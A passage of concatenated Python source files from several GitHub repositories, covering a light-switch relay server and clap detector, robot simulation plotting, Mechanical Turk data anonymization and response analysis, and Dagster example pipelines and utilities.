x[:,k+1] = rk4(t[k],h,x[:,k],u[p-1])
plt.figure('b.1')
plt.subplot(2,1,1)
plt.plot(t,x[0,:])
plt.subplot(2,1,2)
plt.plot(t,x[1,:])
plt.figure('b.2')
plt.plot(t[0:-1],y)
plt.plot(t[0:-1],r)
plt.title('Runge- Kutta comparando degrau y =1')
plt.figure('b.3')
plt.plot(tu[0:len(u)],u)
plt.show()
``` |
{
"source": "jpedrorl/LightSwitch",
"score": 3
} |
#### File: jpedrorl/LightSwitch/androidServer.py
```python
import socket
import sys
import threading
class Server:
def __init__(self, port, relay):
self.port = port
self.running = False
self.thread = threading.Thread(target = self.__startServer)
self.thread.setDaemon(True) # dies with main thread
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind(('', port))
self.relay = relay
def __startServer(self):
self.sock.listen(1)
while self.running:
conn, addr = self.sock.accept()
print "connected to ", addr
isConnected = True
while(isConnected):
try:
buf = conn.recv(8)
if ord(buf[0]) == 1:
self.relay.switch()
except(socket.error, IndexError):
isConnected = False
print "disconnected from ", addr
if(isConnected):
conn.close()
def run(self):
self.running = True
self.thread.start()
def stop(self):
self.running = False
```
#### File: jpedrorl/LightSwitch/clap.py
```python
import alsaaudio
import time
import audioop
import threading
class ClapListener:
clapThreshold = 3000
def __init__(self, relay):
self.inp = alsaaudio.PCM(alsaaudio.PCM_CAPTURE,alsaaudio.PCM_NONBLOCK)
# Set attributes: Mono, 8000 Hz, 16 bit little endian samples
self.inp.setchannels(1)
self.inp.setrate(8000)
self.inp.setformat(alsaaudio.PCM_FORMAT_S16_LE)
# The period size controls the internal number of frames per period.
# Reads from the device will return this many frames. Each frame being 2 bytes long.
# This means that the reads below will return either 320 bytes of data
# or 0 bytes of data. The latter is possible because we are in nonblocking
# mode.
self.inp.setperiodsize(160)
# Relay object
self.relay = relay
# Flag: switch only once per peak
self.hold = False
self.thread = threading.Thread(target = self.__listen)
def __listen(self):
while self.running:
l,data = self.inp.read() # Read data from mic
if l: # data was read
max = audioop.max(data, 2); # max abs input from mic
if max > ClapListener.clapThreshold and not self.hold:
self.relay.switch()
self.hold = True
elif max < ClapListener.clapThreshold:
self.hold = False
def run(self):
self.running = True
self.thread.start()
def stop(self):
self.running = False
``` |
{
"source": "jpedrorl/Robotics-AI",
"score": 3
} |
#### File: Robotics-AI/challenge1/harry_plotter.py
```python
from robot import robot
import matplotlib.pyplot as plt
import math
class harry_plotter:
def __init__(self, rob, robAI):
self.rob = rob
self.robAI = robAI
plt.ion()
def update(self):
self.plotMap()
# self.plotSensors()
def plotSensors(self):
plt.clf()
# initialize graph
plt.title('Sensors')
plt.ylabel('')
plt.xlabel('')
plt.xlim(-1.5,1.5)
plt.ylim(-1.5,1.5)
plt.grid(False)
## This plot is rotate 90 degrees!
# plot sensors
sensors = self.rob.get_rel_sonar_positions()
for p in sensors:
plt.scatter(-p[1], p[0], 1, c='y')
# plot robot center
robotColor = 'black'
if self.robAI.check_stuck:
robotColor = 'yellow'
plt.scatter(0,0,1,c=robotColor)
# plot detected positions
detected = self.rob.get_rel_sonar_readings()
for p in detected:
plt.scatter(-p[1], p[0], 1, c='r')
# Update shown plot
plt.pause(0.000000001)
def plotMap(self):
# plt.clf()
# initialize graph
plt.title('Obstacles Chamber')
plt.ylabel('Y')
plt.xlabel('X')
plt.xlim(-1000,1000)
plt.ylim(-1000,1000)
plt.grid(False)
# plot robot
robotColor = 'red'
if self.robAI.check_stuck:
robotColor = 'yellow'
plt.scatter(int(100 * self.rob.position[0]), int(100 * self.rob.position[1]), 1, c=robotColor)
# plot detected positions
detected = self.rob.get_rel_sonar_readings()
for p in detected:
# rotate
th = self.rob.orientation[2]
x = math.cos(th) * p[0] - math.sin(th) * p[1]
y = math.sin(th) * p[0] + math.cos(th) * p[1]
# translate
x = x + self.rob.position[0]
y = y + self.rob.position[1]
# zoom in and round to integer
x = int(100 * x)
y = int(100 * y)
# plot
plt.scatter(x, y, 1, c='black')
# Update shown plot
plt.pause(0.000000001)
```
#### File: final/ai_utils/noise.py
```python
import random
import numpy as np
class ou:
def apply(self, x, mu=0., theta=.15, sigma=.2):
return theta * (mu - x) + sigma * np.random.randn(1)
```
#### File: Robotics-AI/final/test_robot.py
```python
import random
from time import time
from robbie import Robbie
from simulator import Simulator
TIMEOUT = 10
SIMULATOR_PORT = 25000
def test_robot():
# connect to vrep simulator
sim = Simulator("127.0.0.1", SIMULATOR_PORT)
sim.connect()
# get robbie instance and reset it
robbie = Robbie(sim, "Robbie")
robbie.reset_robot()
# total time of this generation
start_time = time()
# update loop
while True:
# send actions to robot
actions = [random.randrange(-1, 1) for _ in range(8)]
new_state, reward, done = robbie.act(actions)
print(new_state + [reward] + [done])
# get generation execution time
gen_time = time() - start_time
# reset robot if finished simulation or timed out
if done or gen_time >= TIMEOUT:
robbie.reset_robot()
start_time = time()
# disconnect from simulator
sim.disconnect()
if __name__ == "__main__":
test_robot()
``` |
{
"source": "jpeelle/sentence-prediction",
"score": 4
} |
#### File: jpeelle/sentence-prediction/anonymizer.py
```python
import sys
def mturk_anonymizer(csvfiles):
'''
Anonymizes Mechanical Turk data by changing the HITId to a number that can't
be used to identify the participant, but ensures that each participant has
the same new number even if they participate in multiple trials.
Inputs: csvfiles, a list of csv files with Mechanical Turk data that need to
be anonymized. Assumes the first column is the HITId.
Outputs: None, writes a file for each input file (files named the same with
'anonymized_' appended to the front). The file that is written out replaces
the HITId with a different number that can't be used to identify the
participant
'''
header = []
id_dict = {} #Keeps track of which number each WorkerId has been mapped to
id_count = 0
for csvfile in csvfiles:
with open('anonymized_'+csvfile, 'w') as anon_file:
with open(csvfile, 'r') as file:
header = file.readline()
header_list = header.split('","')
anon_file.write(header)
worker_id_index = header_list.index('WorkerId')
for line in file:
line_list = line.split('","')
id = str(line_list[15]) #line_list[15] is the WorkerId
if id not in id_dict:
id_count += 1
id_dict[id] = str(id_count)
line_list[15] = id_dict[id]
else:
line_list[15] = id_dict[id]
anon_line = '","'.join(line_list)
anon_file.write('"'+anon_line)
'''
Takes each csv with Mechanical Turk data as a command line argument
Example: $python3 anonymizer.py file1.csv file2.csv file3.csv
Would write an anonymized file for file1.csv, file2.csv, and file3.csv
'''
mturk_anonymizer([f for f in sys.argv[1:]])
```
#### File: jpeelle/sentence-prediction/predict_sent_analysis.py
```python
from collections import OrderedDict
import sys
import string
import argparse
from math import log2
def csv_reader(csvfiles, replacement_file=None, censor_file=None, exclusion_file=None):
''' Takes a list of Mechanical Turk csv files as input. For each file, it
finds all sentences and answers and creates two dictionaries. One maps
sentences to answers and their frequencies. The other maps answers to the
questions in which they appear.
Inputs: csvfiles, a list of csv files
Outputs: (question_dict, answer_dict), a tuple of dictionaries
'''
question_dict = {}
answer_dict = {}
question_numbers = {}
question_number = 1
header = []
censor_list = []
exclusion_list = []
if exclusion_file is not None:
with open(exclusion_file, 'r') as file:
for line in file:
exclusion_list.append(line.rstrip(string.whitespace).rstrip(string.punctuation))
if censor_file is not None:
with open(censor_file, 'r') as file:
for line in file:
censor_list.append(line.rstrip(string.whitespace).rstrip(string.punctuation))
if replacement_file is not None:
replacement_dict = word_replacer(replacement_file)
else:
replacement_dict = {}
for csvfile in csvfiles:
indices = [] #Tracks columns in the csv that have sentences and answers
with open(csvfile, 'r') as file:
header = file.readline()
header_list = header.split('","')
sub_id_index = header_list.index('WorkerId')
for i in range(len(header_list)):
if 'sentence' in header_list[i]:
indices.append(i)
for line in file:
line_list = line.split('","')
if line_list[sub_id_index] in exclusion_list:
continue
#Half of 'indices' are sentences and half are the responses
num_questions = len(indices) // 2
for i in range(num_questions):
question = line_list[indices[i]]
if question not in question_numbers:
question_numbers[question] = str(question_number)
question_number += 1
answer = line_list[indices[i+num_questions]].lower()
answer = answer.rstrip(string.whitespace)
answer = answer.rstrip(string.punctuation)
if answer in censor_list:
answer = answer.replace(answer[1:],'*'*(len(answer)-1))
if len(answer) == 0:
answer = 'No Response'
if question_numbers[question] in replacement_dict:
if answer in replacement_dict[question_numbers[question]]:
answer = replacement_dict[question_numbers[question]][answer]
if i == (num_questions - 1):
#Strip the newline character off the end of last answer
answer = answer.strip('"\n')
if question in question_dict:
question_dict[question].append(answer)
else:
question_dict[question] = [answer]
if answer in answer_dict:
answer_dict[answer].add(question)
else:
answer_dict[answer] = set([question])
#Get proportion of total answers
for key, val in question_dict.items():
counter = {}
total = len(val)
for item in val:
#Track how many times an item appears as an answer
if item in counter:
counter[item][0] += 1
else:
counter[item] = [1]
#Add additional field with proportion of total answers to each answer
for k, v in counter.items():
v.append('{}/{}'.format(v[0], total))
v[0] = round(int(v[0]) / total, 2)
answer_dict[k].add((key,v[0]))
answer_dict[k].remove(key)
question_dict[key] = counter
return (question_dict, answer_dict)
def word_replacer(replacement_file):
replacement_dict = {}
with open(replacement_file, 'r') as file:
header = file.readline()
for line in file:
line_list = line.split(',')
question_number = ''.join(c for c in line_list[0] if c.isdigit())
if question_number not in replacement_dict:
replacement_dict[question_number] = {}
replacement_dict[question_number][line_list[1]] = line_list[2]
return replacement_dict
def freq_sorter(data_dict):
'''Sorts answers by the their frequency, such that higher frequency answers
appear first.
Inputs: data_dict, a dictionary that maps sentences to a dictionary, which
maps answers to a pair of: the number of responses and the proportion of
total responses
Outputs: data_dict, the same dictionary except answers are now sorted such
that higher frequency responses appear first
'''
for key, value in data_dict.items():
#Sorts answers in descending order with the frequency as the key
data_dict[key] = OrderedDict(sorted(value.items(),
key=lambda x: x[1][0], reverse=True))
return data_dict
def output_markdown(data_dict, filename='output.md'):
'''Writes input dictionary out to a file.
Inputs: -data_dict, a dictionary
-filename, a string (default value is 'output.txt')
Outputs: None, creates file named filename with data from data_dict
'''
print('Writing markdown file, {}'.format(filename))
with open(filename, 'w') as file:
count = 1 #For printing Question number above each question
for k, v in data_dict.items():
file.write('{}. {}\n\n'.format(count, k))
for key, val in v.items():
file.write('\t* {} ({:.2f})\n'.format(key, val[0]))
file.write('\n')
count += 1
def output_csv(data_dict, filename='output.tsv', separator='\t'):
print('Writing tsv file, {}'.format(filename))
with open(filename, 'w') as file:
max_resp = 0
for k, v in data_dict.items():
num_answers = len(v)
if num_answers > max_resp:
max_resp = num_answers
#num_ans_resp = []
num_ans = []
num_resp = []
for i in range(max_resp):
#num_ans_resp.append('Answer_' + str(i + 1))
#num_ans_resp.append('Percent_of_Responses_' + str(i + 1))
num_ans.append('Answer_' + str(i + 1))
num_resp.append('Percent_of_Responses_' + str(i + 1))
#header = separator.join(['Question','Number_of_Unique_Responses', 'Response_Entropy', 'Highest_Response_Percent'] + num_ans_resp)
header = separator.join(['Question','Number_of_Unique_Responses', 'Response_Entropy', 'Highest_Response_Percent'] + num_ans + num_resp)
file.write(header + '\n')
for k, v in data_dict.items():
entropy = 0
question = k
num_answers = str(len(v))
answers = []
values = []
highest_percent = 0
for key, val in v.items():
p = val[0]
entropy += p*log2(p)
if p > highest_percent:
highest_percent = p
#answers.append('{}\t{}'.format(key, val[0]))
answers.append(str(key))
values.append(str(val[0]))
entropy *= -1
entropy_str = str(round(entropy, 2))
highest_percent_str = str(highest_percent)
answer_str = separator.join(answers)
value_str = separator.join(values)
line = separator.join((question, num_answers, entropy_str, highest_percent_str, answer_str, value_str))
file.write(line + '\n')
def output_answer_dict(ans_dict, filename):
with open(filename, 'w') as file:
max_qs = 0
for k, v in ans_dict.items():
if len(v) > max_qs:
max_qs = len(v)
num_q = []
for i in range(max_qs):
num_q.append('Question_' + str(i + 1))
num_q.append('Freq_' + str(i + 1))
header = '\t'.join(['Answer', 'Number_of_Questions'] + num_q)
file.write(header + '\n')
for k, v in ans_dict.items():
v_list = [n[0]+'\t'+str(n[1]) for n in v]
line = '\t'.join([k]+[str(len(v_list))]+v_list)
file.write(line + '\n')
# # Relies on a Python Library (pyenchant) to determine if a word is real or not
# # doesn't account for misspellings
# def word_checker(data_dict):
# '''Checks if each answer is in the english dictionary, if not the answer is
# removed.
# Inputs: data_dict, a dictionary that maps sentences to a dictionary, which
# maps answers to a pair of: the number of responses and the proportion of
# total responses
# Outputs: data_dict, the same dictionary but potentially with some answers
# removed
# '''
# en_dic = enchant.Dict('en_US')
# for k, v in data_dict.items():
# bad_keys = []
# new_total = 0
#
# for key in v:
# if not en_dic.check(key):
# bad_keys.append(key)
# for i in bad_keys:
# del v[i]
#
# if len(bad_keys) > 0:
# for key, val in v.items():
# new_total += val[0]
# for key, val in v.items():
# val[1] = '{}/{}'.format(val[0], new_total)
#
# return data_dict
# # Combines infrequent responses into one 'Other' category
# # doesn't account for misspellings
# def infrequency_checker(data_dict, cutoff=2, write_file):
# '''Combines responses that have a number of occurrences less than or equal
# to the cutoff into a single 'Other' category. Optionally writes out all
# removed responses to a file.
# Inputs: -data_dict, a dictionary that maps sentences to a dictionary, which
# maps answers to a pair of: the number of responses and the proportion of
# total responses
# -cutoff, an int that determines how few responses an answer can have before
# it is removed
# -write_file, a bool, if True then the words are written to a file
# Outputs: -(data_dict, infreq_resp), a tuple of the dictionary (potentially)
# with some answer combined into the 'Other' category and the list of answers
# that were removed
# -Optionally writes out a file called 'infreq_resp.txt' that contains all the
# removed words
# '''
# infreq_resp = []
# for k, v in data_dict.items():
# count = 0
# bad_keys = []
#
# for key, val in v.items():
# if val[0] <= cutoff:
# count += val[0]
# total = val[1].split('/')[1]
# bad_keys.append(key)
# for i in bad_keys:
# infreq_resp.append(v[i])
# del v[i]
# v['other'] = [count, '{}/{}'.format(count, total)]
#
# if write_file:
# with open('infreq_resp.txt', 'w') as file:
# for resp in infreq_resp:
# file.write('{}\n'.format(resp))
#
# return (data_dict, infreq_resp)
args = sys.argv
if ('--help' or '-h') in args:
print('Usage:')
print(' python3 predict_sent_analysis.py <input file 1> <input file 2> ... [options]')
print('Optional Arguments:')
print(' -h, --help\tShow help and exit.')
print(' -r <replacement file>\tTakes input csv with "Question #,word_to_replace,word_to_replace_with" on each line and makes replacements.')
print(' -p\tPrints output to stdout.')
print(' -m [filename]\tWrites output to a markdown file, default file name is output.md.')
print(' -t [filename]\tWrites output to a tsv with "Question Answer 1 Answer 2 ... Freq 1 Freq 2 ..." on each line, default filename is output.tsv.')
print(' -c <censor file>\tTakes input file with one word to censor per line and censors those words.')
print(' -e <exclusion file>\tTakes input file with one Worker ID number to exclude per line and removes responses from those workers.')
exit()
#Optional Files
replacement_file = None
censor_file = None
exclusion_file = None
##Input Files
filenames = []
i = 1
if len(args) == 0:
print('No input filenames provided. Please include input filenames or run with --help for help.')
while(args[i][0] != '-'):
filenames.append(args[i])
i += 1
if not filenames:
print('No input filenames provided. Please include input filenames or run with --help for help.')
exit()
##REPLACEMENT FILE
if '-r' in args:
index = args.index('-r')
if len(args) < index+2:
print('No replacement filename provided. Please include a replacement filename or run with --help for help.')
exit()
if args[index+1][0] == '-':
print('No replacement filename provided. Please include a replacement filename or run with --help for help.')
exit()
replacement_file = args[index+1]
##CENSOR FILE
if '-c' in args:
index = args.index('-c')
if len(args) < index+2:
print('No censor filename provided. Please include a censor filename or run with --help for help.')
exit()
if args[index+1][0] == '-':
print('No censor filename provided. Please include a censor filename or run with --help for help.')
exit()
censor_file = args[index+1]
##EXCLUSION FILE
if '-e' in args:
index = args.index('-e')
if len(args) < index+2:
print('No exclusion filename provided. Please include an exclusion filename or run with --help for help.')
exit()
if args[index+1][0] == '-':
print('No exclusion filename provided. Please include an exclusion filename or run with --help for help.')
exit()
exclusion_file = args[index+1]
#Run the program
dicts = csv_reader(filenames, replacement_file, censor_file, exclusion_file)
q_dict = dicts[0]
a_dict = dicts[1]
sorted_q_dict = freq_sorter(q_dict)
##PRINT TO STDOUT
if '-p' in args:
for k, v in q_dict.items():
sorted_answers = sorted(v.items(), key=lambda x: x[1][0], reverse=True)
print(k, sorted_answers)
print('\n')
##WRITE TO MARKDOWN FILE
if '-m' in args:
index = args.index('-m')
if len(args) >= index+2:
if args[index+1][0] != '-':
output_markdown(sorted_q_dict, args[index+1])
else:
output_markdown(sorted_q_dict)
##WRITE TO CSV FILE
if '-t' in args:
index = args.index('-t')
if len(args) >= index+2:
if args[index+1][0] != '-':
output_csv(sorted_q_dict, args[index+1])
else:
output_csv(sorted_q_dict)
##OUTPUTS FOR SEARCH FUNCTION
output_csv(sorted_q_dict, 'questions_dict.tsv', '\t')
output_answer_dict(a_dict, 'answers_dict.tsv')
``` |
{
"source": "JPeer264/dagster-fork",
"score": 2
} |
#### File: examples/airflow_ingest/repo.py
```python
from airflow_complex_dag import complex_dag
from airflow_simple_dag import simple_dag
from dagster_airflow.dagster_pipeline_factory import make_dagster_pipeline_from_airflow_dag
from dagster import RepositoryDefinition
airflow_simple_dag = make_dagster_pipeline_from_airflow_dag(simple_dag)
airflow_complex_dag = make_dagster_pipeline_from_airflow_dag(complex_dag)
def define_repository():
return RepositoryDefinition(
"airflow_ingest", pipeline_defs=[airflow_complex_dag, airflow_simple_dag]
)
```
#### File: dagster_examples/bay_bikes/repository.py
```python
from dagster import repository
from .pipelines import daily_weather_pipeline, generate_training_set_and_train_model
@repository
def bay_bikes_demo():
return {
'pipelines': {
'generate_training_set_and_train_model': lambda: generate_training_set_and_train_model,
'daily_weather_pipeline': lambda: daily_weather_pipeline,
}
}
```
#### File: dagster_examples/dagster_pandas_guide/core_trip_pipeline.py
```python
from datetime import datetime
from dagster_pandas import PandasColumn, create_dagster_pandas_dataframe_type
from pandas import DataFrame, read_csv
from dagster import OutputDefinition, pipeline, solid
from dagster.utils import script_relative_path
TripDataFrame = create_dagster_pandas_dataframe_type(
name='TripDataFrame',
columns=[
PandasColumn.integer_column('bike_id', min_value=0),
PandasColumn.categorical_column('color', categories={'red', 'green', 'blue'}),
PandasColumn.datetime_column(
'start_time', min_datetime=datetime(year=2020, month=2, day=10)
),
PandasColumn.datetime_column('end_time', min_datetime=datetime(year=2020, month=2, day=10)),
PandasColumn.string_column('station'),
PandasColumn.exists('amount_paid'),
PandasColumn.boolean_column('was_member'),
],
)
@solid(output_defs=[OutputDefinition(name='trip_dataframe', dagster_type=TripDataFrame)])
def load_trip_dataframe(_) -> DataFrame:
return read_csv(
script_relative_path('./ebike_trips.csv'),
parse_dates=['start_time', 'end_time'],
date_parser=lambda x: datetime.strptime(x, '%Y-%m-%d %H:%M:%S.%f'),
)
@pipeline
def trip_pipeline():
load_trip_dataframe()
```
#### File: dagster_examples/dagster_pandas_guide/repository.py
```python
from dagster import repository
from .core_trip_pipeline import trip_pipeline
from .custom_column_constraint_pipeline import custom_column_constraint_pipeline
from .shape_constrained_pipeline import shape_constrained_pipeline
from .summary_stats_pipeline import summary_stats_pipeline
@repository
def dagster_pandas_guide_examples():
return {
'pipelines': {
'custom_column_constraint_pipeline': lambda: custom_column_constraint_pipeline,
'shape_constrained_pipeline': lambda: shape_constrained_pipeline,
'summary_stats_pipeline': lambda: summary_stats_pipeline,
'trip_pipeline': lambda: trip_pipeline,
}
}
```
#### File: dagster_examples/stocks/schedules.py
```python
import datetime
from dagster.core.definitions.decorators import monthly_schedule
@monthly_schedule(
pipeline_name='compute_total_stock_volume', start_date=datetime.datetime(2018, 1, 1),
)
def daily_stock_schedule(date):
previous_month_last_day = date - datetime.timedelta(days=1)
previous_month_first_day = previous_month_last_day.replace(day=1)
return {
'solids': {
'get_stock_data': {
'config': {
'ds_start': previous_month_first_day.strftime("%Y-%m-%d"),
'ds_end': previous_month_last_day.strftime("%Y-%m-%d"),
'symbol': 'AAPL',
}
}
}
}
def define_schedules():
return [daily_stock_schedule]
```
#### File: examples/dagster_examples_tests/test_examples.py
```python
from __future__ import print_function
import os
import yaml
from click.testing import CliRunner
from dagster import seven
from dagster.api.launch_scheduled_execution import sync_launch_scheduled_execution
from dagster.cli.pipeline import execute_list_command, pipeline_list_command
from dagster.core.definitions.reconstructable import ReconstructableRepository
from dagster.core.scheduler import ScheduledExecutionSuccess
from dagster.core.test_utils import environ
from dagster.utils import file_relative_path, script_relative_path
def no_print(_):
return None
def test_list_command():
runner = CliRunner()
execute_list_command(
{
'repository_yaml': script_relative_path('../repository.yaml'),
'python_file': None,
'module_name': None,
'fn_name': None,
},
no_print,
)
result = runner.invoke(
pipeline_list_command, ['-w', script_relative_path('../repository.yaml')]
)
assert result.exit_code == 0
def test_schedules():
with seven.TemporaryDirectory() as temp_dir:
with environ({'DAGSTER_HOME': temp_dir}):
with open(os.path.join(temp_dir, 'dagster.yaml'), 'w') as fd:
yaml.dump(
{
'scheduler': {
'module': 'dagster.utils.test',
'class': 'FilesystemTestScheduler',
'config': {'base_dir': temp_dir},
}
},
fd,
default_flow_style=False,
)
recon_repo = ReconstructableRepository.from_legacy_repository_yaml(
file_relative_path(__file__, '../repository.yaml')
)
for schedule_name in [
'many_events_every_min',
'pandas_hello_world_hourly',
]:
schedule = recon_repo.get_reconstructable_schedule(schedule_name)
result = sync_launch_scheduled_execution(schedule.get_origin())
assert isinstance(result, ScheduledExecutionSuccess)
```
#### File: dagster_examples/toys/tree_demo.py
```python
import time
from collections import defaultdict
from random import randint
from dagster import (
DependencyDefinition,
InputDefinition,
Output,
OutputDefinition,
PipelineDefinition,
SolidDefinition,
check,
)
def generate_solid(solid_id, num_outputs):
def compute_fn(_context, _parent):
time.sleep(float(randint(0, 100)) / 1000)
for i in range(num_outputs):
yield Output(i, 'out_{}'.format(i))
return SolidDefinition(
name=solid_id,
input_defs=[InputDefinition(name='parent')],
output_defs=[OutputDefinition(name='out_{}'.format(i)) for i in range(num_outputs)],
compute_fn=compute_fn,
)
def generate_tree(name, branch_factor, depth):
"""
This function generates a pipeline definition which consists of solids that are arranged in a balanced tree.
The compute functions in all of these solids sleep for a random interval and yield a integer to their corresponding
outputs.
Args:
name (str): The name of the pipeline.
branch_factor (int): the number of output branches for any non-leaf node.
depth (int): depth of the tree.
"""
check.str_param(name, 'name')
check.int_param(branch_factor, 'branch_factor')
check.int_param(depth, 'depth')
node_counter = 0
leaves = [generate_solid('{}_solid'.format(node_counter), branch_factor)]
node_counter += 1
level = 0
deps = defaultdict(dict)
solids = []
while level != depth:
num_iterations = branch_factor ** level
for _ in range(num_iterations):
solid_to_connect = leaves.pop()
solids.append(solid_to_connect)
for output in solid_to_connect.output_defs:
new_output_solid = generate_solid('{}_solid'.format(node_counter), branch_factor)
node_counter += 1
deps[new_output_solid.name]['parent'] = DependencyDefinition(
solid_to_connect.name, output.name
)
leaves = [new_output_solid] + leaves
level += 1
solids += leaves
return PipelineDefinition(name=name, solid_defs=solids, dependencies=deps)
```
#### File: automation/automation/parse_dataproc_configs.py
```python
from __future__ import print_function
import os
import pprint
from collections import namedtuple
import requests
from .printer import IndentingBufferPrinter
SCALAR_TYPES = {
'string': 'String',
'boolean': 'Bool',
'number': 'Int',
'enumeration': 'String',
'integer': 'Int',
}
class List(object):
def __init__(self, inner_type):
self.inner_type = inner_type
class Enum(object):
def __init__(self, name, enum_names, enum_descriptions):
self.name = name
self.enum_names = enum_names
self.enum_descriptions = enum_descriptions
def write(self, printer):
printer.line(self.name.title() + ' = Enum(')
with printer.with_indent():
printer.line('name=\'{}\','.format(self.name.title()))
printer.line('enum_values=[')
with printer.with_indent():
if self.enum_descriptions:
for name, value in zip(self.enum_names, self.enum_descriptions):
prefix = 'EnumValue(\'{}\', description=\'\'\''.format(name)
printer.block(value + '\'\'\'),', initial_indent=prefix)
else:
for name in self.enum_names:
printer.line('EnumValue(\'{}\'),'.format(name))
printer.line('],')
printer.line(')')
class Field(object):
'''Field represents a field type that we're going to write out as a dagster config field, once
we've pre-processed all custom types
'''
def __init__(self, fields, is_required, description):
self.fields = fields
self.is_required = is_required
self.description = description
def __repr__(self):
return 'Field(%s, %s, %s)' % (
pprint.pformat(self.fields),
str(self.is_required),
self.description,
)
def _print_fields(self, printer):
# Scalars
if isinstance(self.fields, str):
printer.append(self.fields)
# Enums
elif isinstance(self.fields, Enum):
printer.append(self.fields.name)
# Lists
elif isinstance(self.fields, List):
printer.append('[')
self.fields.inner_type.write(printer, field_wrapped=False)
printer.append(']')
# Dicts
else:
printer.line('Shape(')
with printer.with_indent():
printer.line('fields={')
with printer.with_indent():
for (k, v) in self.fields.items():
# We need to skip "output" fields which are API responses, not queries
if 'Output only' in v.description:
continue
# This v is a terminal scalar type, print directly
if isinstance(v, str):
printer.line("'{}': {},".format(k, v))
# Recurse nested fields
else:
with printer.with_indent():
printer.append("'{}': ".format(k))
v.write(printer)
printer.append(',')
printer.line('},')
printer.line(')')
def write(self, printer, field_wrapped=True):
'''Use field_wrapped=False for Lists that should not be wrapped in Field()
'''
if not field_wrapped:
self._print_fields(printer)
return printer.read()
printer.append('Field(')
printer.line('')
with printer.with_indent():
self._print_fields(printer)
printer.append(',')
# Print description
if self.description:
printer.block(
self.description.replace("'", "\\'") + "''',", initial_indent="description='''"
)
# Print is_required=True/False if defined; if not defined, default to True
printer.line(
'is_required=%s,' % str(self.is_required if self.is_required is not None else True)
)
printer.line(')')
return printer.read()
class ParsedConfig(namedtuple('_ParsedConfig', 'name configs enums')):
def __new__(cls, name, configs, enums):
return super(ParsedConfig, cls).__new__(cls, name, configs, enums)
def write_configs(self, base_path):
configs_filename = 'configs_%s.py' % self.name
print('Writing', configs_filename)
with open(os.path.join(base_path, configs_filename), 'wb') as f:
f.write(self.configs)
enums_filename = 'types_%s.py' % self.name
with open(os.path.join(base_path, enums_filename), 'wb') as f:
f.write(self.enums)
class ConfigParser(object):
def __init__(self, schemas):
self.schemas = schemas
# Stashing these in a global so that we can write out after we're done constructing configs
self.all_enums = {}
def extract_config(self, base_field, suffix):
with IndentingBufferPrinter() as printer:
printer.write_header()
printer.line('from dagster import Bool, Field, Int, Permissive, Shape, String')
printer.blank_line()
# Optionally write enum includes
if self.all_enums:
printer.line(
'from .types_{} import {}'.format(suffix, ', '.join(self.all_enums.keys()))
)
printer.blank_line()
printer.line('def define_%s_config():' % suffix)
with printer.with_indent():
printer.append('return ')
base_field.write(printer)
return printer.read().strip().encode()
def extract_enums(self):
if not self.all_enums:
return
with IndentingBufferPrinter() as printer:
printer.write_header()
printer.line('from dagster import Enum, EnumValue')
printer.blank_line()
for enum in self.all_enums:
self.all_enums[enum].write(printer)
printer.blank_line()
return printer.read().strip().encode()
def parse_object(self, obj, name=None, depth=0, enum_descriptions=None):
# This is a reference to another object that we should substitute by recursing
if '$ref' in obj:
name = obj['$ref']
return self.parse_object(self.schemas.get(name), name, depth + 1)
# Print type tree
prefix = '|' + ('-' * 4 * depth) + ' ' if depth > 0 else ''
print(prefix + (name or obj.get('type')))
# Switch on object type
obj_type = obj.get('type')
# Handle enums
if 'enum' in obj:
# I think this is a bug in the API JSON spec where enum descriptions are a level higher
# than they should be for type "Component" and the name isn't there
if name is None:
name = 'Component'
enum = Enum(name, obj['enum'], enum_descriptions or obj.get('enumDescriptions'))
self.all_enums[name] = enum
fields = enum
# Handle dicts / objects
elif obj_type == 'object':
# This is a generic k:v map
if 'additionalProperties' in obj:
fields = 'Permissive()'
else:
fields = {
k: self.parse_object(v, k, depth + 1) for k, v in obj['properties'].items()
}
# Handle arrays
elif obj_type == 'array':
fields = List(
self.parse_object(
obj.get('items'), None, depth + 1, enum_descriptions=obj.get('enumDescriptions')
)
)
# Scalars
elif obj_type in SCALAR_TYPES:
fields = SCALAR_TYPES.get(obj_type)
# Should never get here
else:
raise Exception('unknown type: ', obj)
return Field(fields, is_required=None, description=obj.get('description'))
def extract_schema_for_object(self, object_name, name):
# Reset enums for this object
self.all_enums = {}
obj = self.parse_object(self.schemas.get(object_name), object_name)
return ParsedConfig(
name=name, configs=self.extract_config(obj, name), enums=self.extract_enums()
)
def main():
api_url = 'https://www.googleapis.com/discovery/v1/apis/dataproc/v1/rest'
base_path = '../libraries/dagster-gcp/dagster_gcp/dataproc/'
json_schema = requests.get(api_url).json().get('schemas')
c = ConfigParser(json_schema)
parsed = c.extract_schema_for_object('Job', 'dataproc_job')
parsed.write_configs(base_path)
parsed = c.extract_schema_for_object('ClusterConfig', 'dataproc_cluster')
parsed.write_configs(base_path)
if __name__ == '__main__':
main()
```
#### File: dagster/api/execute_run.py
```python
from dagster import check
from dagster.core.events import EngineEventData
from dagster.core.instance import DagsterInstance
from dagster.core.origin import PipelinePythonOrigin
from dagster.core.storage.pipeline_run import PipelineRun
from dagster.serdes.ipc import ipc_read_event_stream, open_ipc_subprocess, write_unary_input
from dagster.utils import safe_tempfile_path
def cli_api_execute_run(output_file, instance, pipeline_origin, pipeline_run):
check.str_param(output_file, 'output_file')
check.inst_param(instance, 'instance', DagsterInstance)
check.inst_param(pipeline_origin, 'pipeline_origin', PipelinePythonOrigin)
check.inst_param(pipeline_run, 'pipeline_run', PipelineRun)
from dagster.cli.api import ExecuteRunArgs, ExecuteRunArgsLoadComplete
with safe_tempfile_path() as input_file:
write_unary_input(
input_file,
ExecuteRunArgs(
pipeline_origin=pipeline_origin,
pipeline_run_id=pipeline_run.run_id,
instance_ref=instance.get_ref(),
),
)
parts = [
pipeline_origin.executable_path,
'-m',
'dagster',
'api',
'execute_run',
input_file,
output_file,
]
instance.report_engine_event(
'About to start process for pipeline "{pipeline_name}" (run_id: {run_id}).'.format(
pipeline_name=pipeline_run.pipeline_name, run_id=pipeline_run.run_id
),
pipeline_run,
engine_event_data=EngineEventData(marker_start='cli_api_subprocess_init'),
)
process = open_ipc_subprocess(parts)
# we need to process this event in order to ensure that the called process loads the input
event = next(ipc_read_event_stream(output_file))
check.inst(event, ExecuteRunArgsLoadComplete)
return process
```
#### File: dagster/api/list_repositories.py
```python
from dagster import check
from .utils import execute_unary_api_cli_command
def sync_list_repositories(executable_path, python_file, module_name):
from dagster.cli.api import ListRepositoriesResponse, ListRepositoriesInput
return check.inst(
execute_unary_api_cli_command(
executable_path,
